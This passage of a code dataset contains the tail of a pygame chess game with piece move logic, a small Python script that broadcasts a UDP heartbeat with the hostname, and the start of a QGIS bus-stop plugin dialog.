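#     screen = pygame.display.set_mode((600, 600))
#     board = Board(screen, (0, 0), 600)
#     board.draw()
#     board.playPVP()   # the two-player event loop defined above
# ---------------------------------------------------------------------------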
This function returns true if a move is illegal,\n\tand is used at the end of the updatePotentialSpaces method of all\n\tPiece derived classes to filter illegal moves.\n\t\"\"\"\n\tdef leavesKingOpen(self, myPieceList, opponentPieceList, futurePosition):\n\t\tmyKing = Board.getPiecebyRank(myPieceList, kingRank)\n\t\toriginalKingPosition = myKing.position\n\t\tif Board.isOccupied(opponentPieceList, futurePosition):\n\t\t\tpotentialKill = Board.getPiecebyPosition(opponentPieceList, futurePosition)\n\t\t\t#new opponent piece list if king kills piece\n\t\t\tfutureOpponentPieceList = opponentPieceList.copy()\n\t\t\tfutureOpponentPieceList.remove(potentialKill)\n\t\t\t#new my piece list for new king position\n\t\t\tcurrentPosition = self.position\n\t\t\tself.position = futurePosition\n\t\t\tself.row = futurePosition[0]\n\t\t\tself.col = futurePosition[1]\n\t\t\tfor piece in futureOpponentPieceList:\n\t\t\t\t#if this king will be in opponent king's range\n\t\t\t\tif piece.rank == kingRank:\n\t\t\t\t\tif abs(myKing.position[0]-piece.position[0]) <= 1 and abs(myKing.position[1]-piece.position[1]) <= 1:\n\t\t\t\t\t\tmyKing.position = originalKingPosition\n\t\t\t\t\t\tmyKing.row = originalKingPosition[0]\n\t\t\t\t\t\tmyKing.col = originalKingPosition[1]\n\t\t\t\t\t\treturn True\n\t\t\t\t#all other pieces\n\t\t\t\telse:\n\t\t\t\t\t#save the current potential spaces of the opponent's piece\n\t\t\t\t\tcurrentPotentialSpaces = piece.potentialSpaces.copy()\n\t\t\t\t\t#generate potential spaces given the king kills the original piece\n\t\t\t\t\tpiece.updatePotentialSpaces(futureOpponentPieceList, myPieceList, False)\n\t\t\t\t\t#store spaces\n\t\t\t\t\tif myKing.position in piece.potentialSpaces:\n\t\t\t\t\t\tself.position = currentPosition\n\t\t\t\t\t\tself.row = currentPosition[0]\n\t\t\t\t\t\tself.col = currentPosition[1]\n\t\t\t\t\t\tpiece.potentialSpaces = currentPotentialSpaces\n\t\t\t\t\t\treturn True\n\t\t\t\t\t#reassign original spaces\n\t\t\t\t\tpiece.potentialSpaces = currentPotentialSpaces\n\t\t\tself.position = currentPosition\n\t\t\tself.row = currentPosition[0]\n\t\t\tself.col = currentPosition[1]\n\t\t\treturn False\n\t\telse:\n\t\t\tcurrentPosition = self.position\n\t\t\tself.position = futurePosition\n\t\t\tself.row = futurePosition[0]\n\t\t\tself.col = futurePosition[1]\n\t\t\tfor piece in opponentPieceList:\n\t\t\t\t#if this king will be in opponent king's range\n\t\t\t\tif piece.rank == kingRank:\n\t\t\t\t\tif abs(myKing.position[0]-piece.position[0]) <= 1 and abs(myKing.position[1]-piece.position[1]) <= 1:\n\t\t\t\t\t\tmyKing.position = originalKingPosition\n\t\t\t\t\t\tmyKing.row = originalKingPosition[0]\n\t\t\t\t\t\tmyKing.col = originalKingPosition[1]\n\t\t\t\t\t\treturn True\n\t\t\t\t#all other pieces\n\t\t\t\telse:\n\t\t\t\t\t#save the current potential spaces of the opponent's piece\n\t\t\t\t\tcurrentPotentialSpaces = piece.potentialSpaces.copy()\n\t\t\t\t\t#generate potential spaces given the king kills the original piece\n\t\t\t\t\tpiece.updatePotentialSpaces(opponentPieceList, myPieceList, False)\n\t\t\t\t\t#store spaces\n\t\t\t\t\tif myKing.position in piece.potentialSpaces:\n\t\t\t\t\t\tself.position = currentPosition\n\t\t\t\t\t\tself.row = currentPosition[0]\n\t\t\t\t\t\tself.col = currentPosition[1]\n\t\t\t\t\t\tpiece.potentialSpaces = currentPotentialSpaces\n\t\t\t\t\t\treturn True\n\t\t\t\t\t#reassign original spaces\n\t\t\t\t\tpiece.potentialSpaces = currentPotentialSpaces\n\t\t\tself.position = currentPosition\n\t\t\tself.row = currentPosition[0]\n\t\t\tself.col = 
currentPosition[1]\n\t\t\treturn False\n\n\t\"\"\" Draws the piece's sprite \"\"\"\n\tdef draw(self, surface):\n\t\tself.spriteGroup.draw(surface)\n\n\t\"\"\"\n\tMoves a piece to the square passed to the newSquare argument.\n\tSets the hasMoved attribute to True.\n\t\"\"\"\n\tdef move(self, newSquare):\n\t\tself.position = newSquare.position\n\t\tself.row = self.position[0]\n\t\tself.col = self.position[1]\n\t\tself.sprite.rect.center = newSquare.square.center\n\t\tself.hasMoved = True\n\n\t\"\"\"\n\tMoves a piece to the square passed to the newSquare argument.\n\tUsed exclusively in the board.rotate() method. Does not change\n\tthe hasMoved attribute.\n\t\"\"\"\n\tdef setPosition(self, newSquare):\n\t\tself.position = newSquare.position\n\t\tself.row = self.position[0]\n\t\tself.col = self.position[1]\n\t\tself.sprite.rect.center = newSquare.square.center\n\n\t\"\"\"\n\tGenerates a new list of spaces that the piece can move to. Each\n\tPiece-derived class overrides this method, which is defined based\n\ton its individual moveset. The piece's own piece list and the piece list\n\tof the opponent must be passed as myPieceList and opponentPieceList,\n\trespectively. checkMyKing is a boolean parameter that indicates\n\twhether or not to call the leavesKingOpen() method for each generated\n\tspace. This is done when checkMyKing is True. checkMyKing is\n\tsupposed to be True only when updating the spaces of a piece that is\n\tselected by a player and is intended to be moved. This function is\n\tcalled in the leavesKingOpen() method for opponent pieces, where the\n\tcheckMyKing parameter is passed as False.\n\t\"\"\"\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tpass\n\n\n\"\"\"\nThe following classes represent chess pieces and derive from the \nPiece class. 
No new attributes are declared for any of these classes,\nwith the exception of the King class, which has two new attributes,\ncastlingPositions and rooksToCastle, which both deal with castling.\nEach class has a unique overridden updatePotentialSpaces() method\nbased on its moveset, which updates the potentialSpaces attribute.\n\"\"\"\nclass Pawn(Piece):\n\tdef __init__(self, image, initialSquare, color):\n\t\tPiece.__init__(self)\n\t\tself.image = image\n\t\tself.sprite = PieceSprite(image, initialSquare.square.center)\n\t\tself.spriteGroup = pygame.sprite.Group(self.sprite)\n\t\tself.position = initialSquare.position\n\t\tself.row = initialSquare.position[0]\n\t\tself.col = initialSquare.position[1]\n\t\tself.color = color\n\t\tself.rank = pawnRank\n\t\tself.initialPosition = self.position\n\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tself.potentialSpaces = []\n\t\t# Pawn can move up one space, or diagonally if the target space is occupied by an opponent piece\n\t\tmoveup = []\n\t\tmoveDiagonals = []\n\t\tif self.color == player1Color:\n\t\t\tmoveup.append((self.row-1, self.col))\n\t\t\tif not Board.isOccupied(myPieceList, moveup[0]) and not Board.isOccupied(opponentPieceList, moveup[0]):\n\t\t\t\tself.potentialSpaces.append(moveup[0])\n\t\t\tif not self.hasMoved: # can move up 2 spaces if hasn't moved\n\t\t\t\tmoveup.append((self.row-2,self.col))\n\t\t\t\tif not Board.isOccupied(myPieceList, moveup[1]) and not Board.isOccupied(opponentPieceList, moveup[1]):\n\t\t\t\t\tself.potentialSpaces.append(moveup[1])\n\t\t\tmoveDiagonals = [(self.row-1, self.col+1), (self.row-1, self.col-1)]\n\t\telse:\n\t\t\tmoveup.append((self.row+1, self.col))\n\t\t\tif not Board.isOccupied(myPieceList, moveup[0]) and not Board.isOccupied(opponentPieceList, moveup[0]):\n\t\t\t\tself.potentialSpaces.append(moveup[0])\n\t\t\tif not self.hasMoved: # can move up 2 spaces if hasn't moved\n\t\t\t\tmoveup.append((self.row+2,self.col))\n\t\t\t\tif not Board.isOccupied(myPieceList, moveup[1]) and not Board.isOccupied(opponentPieceList, moveup[1]):\n\t\t\t\t\tself.potentialSpaces.append(moveup[1])\n\t\t\tmoveDiagonals = [(self.row+1, self.col+1), (self.row+1, self.col-1)]\n\t\tif Board.isOccupied(opponentPieceList, moveDiagonals[0]): self.potentialSpaces.append(moveDiagonals[0])\n\t\tif Board.isOccupied(opponentPieceList, moveDiagonals[1]): self.potentialSpaces.append(moveDiagonals[1])\n\t\t# if this piece is intended to be moved, check if moves leave king open\n\t\tif checkMyKing:\n\t\t\tfor space in self.potentialSpaces.copy():\n\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, space):\n\t\t\t\t\tself.potentialSpaces.remove(space)\n\nclass Rook(Piece):\n\tdef __init__(self, image, initialSquare, color):\n\t\tPiece.__init__(self)\n\t\tself.image = image\n\t\tself.sprite = PieceSprite(image, initialSquare.square.center)\n\t\tself.spriteGroup = pygame.sprite.Group(self.sprite)\n\t\tself.position = initialSquare.position\n\t\tself.row = initialSquare.position[0]\n\t\tself.col = initialSquare.position[1]\n\t\tself.color = color\n\t\tself.rank = rookRank\n\n\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tself.potentialSpaces = []\n\t\t# all squares below\n\t\tfor x in range(self.row+1, 9):\n\t\t\tpos = (x, self.col)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# all squares above\n\t\tfor x in 
range(1, self.row):\n\t\t\tpos = (self.row-x, self.col)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# all squares left\n\t\tfor x in range(1, self.col):\n\t\t\tpos = (self.row, self.col-x)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# all squares right\n\t\tfor x in range(self.col+1, 9):\n\t\t\tpos = (self.row, x)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\tif checkMyKing:\n\t\t\tfor space in self.potentialSpaces.copy():\n\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, space):\n\t\t\t\t\tself.potentialSpaces.remove(space)\n\nclass Knight(Piece):\n\tdef __init__(self, image, initialSquare, color):\n\t\tPiece.__init__(self)\n\t\tself.image = image\n\t\tself.sprite = PieceSprite(image, initialSquare.square.center)\n\t\tself.spriteGroup = pygame.sprite.Group(self.sprite)\n\t\tself.position = initialSquare.position\n\t\tself.row = initialSquare.position[0]\n\t\tself.col = initialSquare.position[1]\n\t\tself.color = color\n\t\tself.rank = knightRank\n\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tself.potentialSpaces = []\n\t\tmovableSpaces = []\n\t\tmovableSpaces.append((self.row+1, self.col+2))\n\t\tmovableSpaces.append((self.row+1, self.col-2))\n\t\tmovableSpaces.append((self.row-1, self.col+2))\n\t\tmovableSpaces.append((self.row-1, self.col-2))\n\t\tmovableSpaces.append((self.row+2, self.col+1))\n\t\tmovableSpaces.append((self.row+2, self.col-1))\n\t\tmovableSpaces.append((self.row-2, self.col+1))\n\t\tmovableSpaces.append((self.row-2, self.col-1))\n\t\tfor space in movableSpaces:\n\t\t\tif Board.isOccupied(myPieceList, space): pass\n\t\t\telif Board.isOccupied(opponentPieceList, space): self.potentialSpaces.append(space)\n\t\t\telif space[0]>0 and space[0]<9 and space[1]>0 and space[1]<9: self.potentialSpaces.append(space)\n\t\tif checkMyKing:\n\t\t\tfor space in self.potentialSpaces.copy():\n\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, space):\n\t\t\t\t\tself.potentialSpaces.remove(space)\n\nclass Bishop(Piece):\n\tdef __init__(self, image, initialSquare, color):\n\t\tPiece.__init__(self)\n\t\tself.image = image\n\t\tself.sprite = PieceSprite(image, initialSquare.square.center)\n\t\tself.spriteGroup = pygame.sprite.Group(self.sprite)\n\t\tself.position = initialSquare.position\n\t\tself.row = initialSquare.position[0]\n\t\tself.col = initialSquare.position[1]\n\t\tself.color = color\n\t\tself.rank = bishopRank\n\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tself.potentialSpaces = []\n\t\t# up right diagonal\n\t\tbound = min(self.row-1, 8-self.col)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row-(x+1), self.col+x+1)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# up left diagonal\n\t\tbound = min(self.row-1, self.col-1)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row-(x+1), self.col-(x+1))\n\t\t\tif 
Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# down right diagonal\n\t\tbound = min(8-self.row, 8-self.col)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row+x+1, self.col+x+1)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# down left diagonal\n\t\tbound = min(8-self.row, self.col-1)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row+x+1, self.col-(x+1))\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\tif checkMyKing:\n\t\t\tfor space in self.potentialSpaces.copy():\n\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, space):\n\t\t\t\t\tself.potentialSpaces.remove(space)\n\nclass Queen(Piece):\n\tdef __init__(self, image, initialSquare, color):\n\t\tPiece.__init__(self)\n\t\tself.image = image\n\t\tself.sprite = PieceSprite(image, initialSquare.square.center)\n\t\tself.spriteGroup = pygame.sprite.Group(self.sprite)\n\t\tself.position = initialSquare.position\n\t\tself.row = initialSquare.position[0]\n\t\tself.col = initialSquare.position[1]\n\t\tself.color = color\n\t\tself.rank = queenRank\n\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tself.potentialSpaces = []\n\t\t# all squares below\n\t\tfor x in range(self.row+1, 9):\n\t\t\tpos = (x, self.col)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# all squares above\n\t\tfor x in range(1, self.row):\n\t\t\tpos = (self.row-x, self.col)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# all squares left\n\t\tfor x in range(1, self.col):\n\t\t\tpos = (self.row, self.col-x)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# all squares right\n\t\tfor x in range(self.col+1, 9):\n\t\t\tpos = (self.row, x)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# up right diagonal\n\t\tbound = min(self.row-1, 8-self.col)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row-(x+1), self.col+x+1)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# up left diagonal\n\t\tbound = min(self.row-1, self.col-1)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row-(x+1), self.col-(x+1))\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# down right diagonal\n\t\tbound = min(8-self.row, 8-self.col)\n\t\tfor x in 
range(0, bound):\n\t\t\tpos = (self.row+x+1, self.col+x+1)\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\t# down left diagonal\n\t\tbound = min(8-self.row, self.col-1)\n\t\tfor x in range(0, bound):\n\t\t\tpos = (self.row+x+1, self.col-(x+1))\n\t\t\tif Board.isOccupied(myPieceList, pos): break\n\t\t\tif Board.isOccupied(opponentPieceList, pos):\n\t\t\t\tself.potentialSpaces.append(pos)\n\t\t\t\tbreak\n\t\t\tself.potentialSpaces.append(pos)\n\t\tif checkMyKing:\n\t\t\tfor space in self.potentialSpaces.copy():\n\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, space):\n\t\t\t\t\tself.potentialSpaces.remove(space)\n\nclass King(Piece):\n\t# New attributes, used for castling\n\tcastlingPositions = []\n\trooksToCastle = []\n\tdef __init__(self, image, initialSquare, color):\n\t\tPiece.__init__(self)\n\t\tself.image = image\n\t\tself.sprite = PieceSprite(image, initialSquare.square.center)\n\t\tself.spriteGroup = pygame.sprite.Group(self.sprite)\n\t\tself.position = initialSquare.position\n\t\tself.row = initialSquare.position[0]\n\t\tself.col = initialSquare.position[1]\n\t\tself.color = color\n\t\tself.rank = kingRank\n\n\tdef updatePotentialSpaces(self, myPieceList, opponentPieceList, checkMyKing):\n\t\tself.potentialSpaces = []\n\t\tself.castlingPositions = []\n\t\tmovableSpaces = []\n\t\tmovableSpaces.append((self.row+1, self.col))\n\t\tmovableSpaces.append((self.row+1, self.col+1))\n\t\tmovableSpaces.append((self.row+1, self.col-1))\n\t\tmovableSpaces.append((self.row, self.col+1))\n\t\tmovableSpaces.append((self.row, self.col-1))\n\t\tmovableSpaces.append((self.row-1, self.col))\n\t\tmovableSpaces.append((self.row-1, self.col+1))\n\t\tmovableSpaces.append((self.row-1, self.col-1))\n\t\tfor space in movableSpaces:\n\t\t\tif space[0] >= 1 and space[0] <= 8 and space[1] >= 1 and space[1] <= 8:\n\t\t\t\tif Board.isOccupied(myPieceList, space): \n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tif not Piece.leavesKingOpen(self, myPieceList, opponentPieceList, space):\n\t\t\t\t\t\tself.potentialSpaces.append(space)\n\t\t# not CheckMyKing to prevent recursion between kings \n\t\t# when checking castling\n\t\tif not checkMyKing: return\n\t\tif not self.canCastle(myPieceList, opponentPieceList): \n\t\t\tself.castlingPositions = []\n\t\t\tself.rooksToCastle = []\n\t\t\n\t\"\"\"\n\tChecks if the king can castle. Appends possible castling positions\n\tand corresponding rooks to self.castlingPositions and \n\tself.rooksToCastle. 
Returns true if anything was appended to the \n\tmentioned lists (there are castling positions available).\n\t\"\"\"\n\tdef canCastle(self, myPieceList, opponentPieceList):\n\t\tif self.hasMoved: return False\n\t\tfor piece in opponentPieceList:\n\t\t\tif Board.checked(piece, opponentPieceList, myPieceList): return False\n\t\tmyRookList = []\n\t\tfor piece in myPieceList:\n\t\t\tif piece.rank == rookRank and not piece.hasMoved: myRookList.append(piece)\n\t\toriginalPosition = self.position\n\t\tfor rook in myRookList.copy():\n\t\t\tif rook.position[1] > self.position[1]:\n\t\t\t\tfor i in range(rook.position[1] - originalPosition[1] - 1):\n\t\t\t\t\tcheckPosition = originalPosition[0], originalPosition[1]+i+1\n\t\t\t\t\tif Board.isOccupied(myPieceList, checkPosition) or Board.isOccupied(opponentPieceList, checkPosition): \n\t\t\t\t\t\tmyRookList.remove(rook)\n\t\t\t\t\t\tbreak\n\t\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, checkPosition): \n\t\t\t\t\t\tmyRookList.remove(rook)\n\t\t\t\t\t\tbreak\n\t\t\t\tif rook in myRookList: \n\t\t\t\t\tself.castlingPositions.append((originalPosition[0], originalPosition[1]+2))\n\t\t\t\t\tself.potentialSpaces.append((originalPosition[0], originalPosition[1]+2))\n\t\t\telse:\n\t\t\t\tfor i in range(originalPosition[1] - rook.position[1] - 1):\n\t\t\t\t\tcheckPosition = originalPosition[0], originalPosition[1]-(i+1)\n\t\t\t\t\tif Board.isOccupied(myPieceList, checkPosition) or Board.isOccupied(opponentPieceList, checkPosition): \n\t\t\t\t\t\tmyRookList.remove(rook)\n\t\t\t\t\t\tbreak\n\t\t\t\t\tif Piece.leavesKingOpen(self, myPieceList, opponentPieceList, checkPosition): \n\t\t\t\t\t\tmyRookList.remove(rook)\n\t\t\t\t\t\tbreak\n\t\t\t\tif rook in myRookList: \n\t\t\t\t\tself.castlingPositions.append((originalPosition[0], originalPosition[1]-2))\n\t\t\t\t\tself.potentialSpaces.append((originalPosition[0], originalPosition[1]-2))\n\t\tif len(myRookList) == 0: return False\n\t\tself.rooksToCastle = myRookList\n\t\treturn True\n\n\n\"\"\"\nEnd of Piece classes.\n\"\"\"\n\n\"\"\"\nSimple Sprite class deriving the abstract base class \npygame.sprite.Sprite used for the sprite attribute of\nPiece classes. 
A center argument is passed to the constructor \nto assign an initial location to the sprite.\n\"\"\"\nclass PieceSprite(pygame.sprite.Sprite):\n\tdef __init__(self, image, center):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.image = image\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = center\n\npygame.init()\n\nscreenWidth = 600\nscreenHeight = 600\nscreen = pygame.display.set_mode((screenWidth, screenHeight))\npygame.display.set_icon(whiteKnightImage)\npygame.display.set_caption(screenCaption)\nscreen.fill(GREY)\nboardLength = screenHeight\nboardpos = (screenWidth-screenHeight)/2, 0\nboard = Board(screen, (boardpos), boardLength)\nwhile True:\n\tselectedOption = launchStartMenu(screen, screenWidth, screenHeight)\n\tif selectedOption == PLAYERVSPLAYER:\n\t\tboard.draw()\n\t\tboard.playPVP()", "sub_path": "ChessBoard2.py", "file_name": "ChessBoard2.py", "file_ext": "py", "file_size_in_byte": 37139, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.Rect", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 162, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 163, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 256, "usage_type": "call"}, {"api_name": "pygame.mixer.music.load", "line_number": 257, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 257, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 258, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 258, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 262, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 262, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 263, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 263, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 264, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 268, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 269, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 277, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 281, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 281, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 334, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 335, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 381, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 382, "usage_type": "call"}, {"api_name": "pygame.sprite.Group", "line_number": 559, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 559, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 603, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 603, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 655, 
"usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 655, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 687, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 687, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 742, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 742, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 832, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 832, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 919, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 921, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 921, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 926, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 930, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 930, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 931, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 931, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 932, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 932, "usage_type": "attribute"}]} +{"seq_id": "355496784", "text": "import datetime\nimport socket\nfrom sys import argv\nimport threading\nfrom time import sleep\n\ndef broadcastAlive():\n ip = \"\"\n port = 8989\n \n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n\n while True:\n msg_prefix = \"22AF4240=\" # Bon Iver - 22, A Million\n msg = msg_prefix + datetime.datetime.now().strftime(\"%A %d %H:%M:%S -- \") + socket.gethostname()\n sock.sendto(msg.encode(), (ip, port))\n sleep(5)\n\ndef broadcastThread():\n bt = threading.Thread(target=broadcastAlive)\n bt.daemon = False # True\n\n return bt\n\nbroadcastThread().start()\n", "sub_path": "Python/udp_broadcast_time.py", "file_name": "udp_broadcast_time.py", "file_ext": "py", "file_size_in_byte": 670, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "socket.socket", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 11, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 11, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 12, "usage_type": "attribute"}, {"api_name": "socket.SO_BROADCAST", "line_number": 12, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "attribute"}, {"api_name": "socket.gethostname", "line_number": 16, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 18, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "350792782", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n/***************************************************************************\n iSimGisDialog\n A QGIS plugin\n iSim converter\n -------------------\n begin : 2014-02-03\n copyright : (C) 2014 by nhudinhtuan\n email : nhudinhtuan@gmail.com\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program 
is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n\"\"\"\nfrom PyQt4 import QtCore, QtGui\nfrom ui_busstop import Ui_Busstop\nimport os\nfrom xml.etree import ElementTree\nfrom qgis.core import *\nfrom qgis.utils import *\n# create the dialog for zoom to point\n\n\nclass BusstopDialog(QtGui.QDialog, Ui_Busstop):\n busstoplist = []\n original_id = 0\n def __init__(self):\n QtGui.QDialog.__init__(self)\n # Set up the user interface from Designer.\n # After setupUI you can access any designer object by doing\n # self., and you can use autoconnect slots - see\n # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\n # #widgets-and-dialogs-with-auto-connect\n self.setupUi(self)\n self.info = None\n self.isModified = False\n\n def setSegmentId(self, segmentId):\n self.segmentId.setText(str(segmentId))\n\n def setInfo(self, info):\n self.info = info\n global original_id\n if self.info is not None:\n self.isModified = True\n self.actionButton.setText(\"SAVE\")\n self.segmentId.setText(str(self.info[\"segmentId\"]))\n self.id.setText(str(self.info[\"id\"]))\n original_id = self.info[\"id\"]\n 